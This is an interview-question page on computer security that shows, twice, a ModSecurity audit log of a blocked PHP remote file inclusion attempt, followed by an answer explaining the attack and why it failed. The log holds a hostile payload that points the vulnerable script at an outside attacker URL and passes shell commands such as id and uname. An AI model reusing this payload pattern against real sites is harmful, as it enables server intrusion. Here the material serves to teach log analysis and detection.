Interview Questions Answers.ORG
Interviewer And Interviewee Guide
Interviews
Quizzes
Home
Quizzes
Interviews Basic Job Interviews:AbilitiesAbroad JobsActivistAmbitionAnalyticalAptitudeAptitude KnowledgeAssertivenessAuthority / DecisivenessBasic CommonBasic Salary RequirementsBehavioralBehavioral BasedBody LanguageBusiness intelligenceCandidate Selection CriteriaCareer StatementsCareers FutureCaseCitizenshipCommunication SkillsComputer BasicsComputer securityConfidence BuildingConflictCorporate CommunicationCreativeCreativityCurrent Affairs 2009Current Affairs 2010Current Affairs 2011Dangerous JobsDecision MakingDetail SkillsDeterminationDifficultDream JobEmployers To AskEntry LevelEthicsExitFace to FaceFailuresFlexibilityFollow UpFrequently AskedFreshers GraduateFunnyFunny QuotesFuture Career PlanningGeneral KnowledgeGeneral SkillsGood EmployeeGood LeaderGraduationGroupGroup DiscussionsHackingHandle StressHard WorkerHotel TourismHow to AnswerIllegalIncidentInitiativeInitiative WorkplaceInteresting CareerInterestsJobJob AttireJob AwarenessJob DemotionJob Follow Up LetterJob KnowledgeJob PerformanceJob ProtocolJob Search TacticsJob TipsJudgmentLearning SkillsLinkedIn RecommendationListening SkillsLogicalMannersMental AttitudeMid LifeMost Inspiring JobsMotivationNegotiate Pay RaiseNegotiation SkillsNo ExperienceNo Work ExperiencePanelPart Time ContractPatiencePay PackagePersonalPersonality TraitsPhonePlacement AssistancePost GraduatePotential EmployeePresent JobProblem SolvingProblem Solving SkillsProhibitedProjectsPuzzlesQuality On TimeQuantitativeQuantitative AptitudeRecession Proof JobReferencesResignationResume FormatResume HelpResume ObjectivesResume Skill SetSalarySalary NegotiationSecond InterviewSecond RoundSecretarySelf AssessmentSelf WorthinessSituationalSkypeStatics ProbabilityStrange JobsTargeted SelectionTeamworkTeamwork MotivationTechnology SkillsTeenTelephone OperatorTelephonicToughTraining AdviceTrickyTypicalUnusualVideoVisaWarm UpWeaknesses and StrengthsWork EthicsWork HistoryWorkplace FlexibilityWritten Skills
Copyright © 2018. All Rights Reserved
Computer security Interview Question:
What application generated the log file entry below? What type of attack is this?
Submitted by: AdministratorWhat application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?
========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "unamex20-a" at POST_PAYLOAD
mod_security-action: 403
65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a
----------------------------------------
Note: Goal of question - to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the command. This attack was not successful for the following two reasons:
· The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname -a" data in the POST PAYLOAD.
· The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command.
Submitted by: Administrator
========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "unamex20-a" at POST_PAYLOAD
mod_security-action: 403
65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a
----------------------------------------
Note: Goal of question - to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the command. This attack was not successful for the following two reasons:
· The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname -a" data in the POST PAYLOAD.
· The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command.
Submitted by: Administrator
Copyright 2007-2025 by Interview Questions Answers .ORG All Rights Reserved.
https://InterviewQuestionsAnswers.ORG.
https://InterviewQuestionsAnswers.ORG.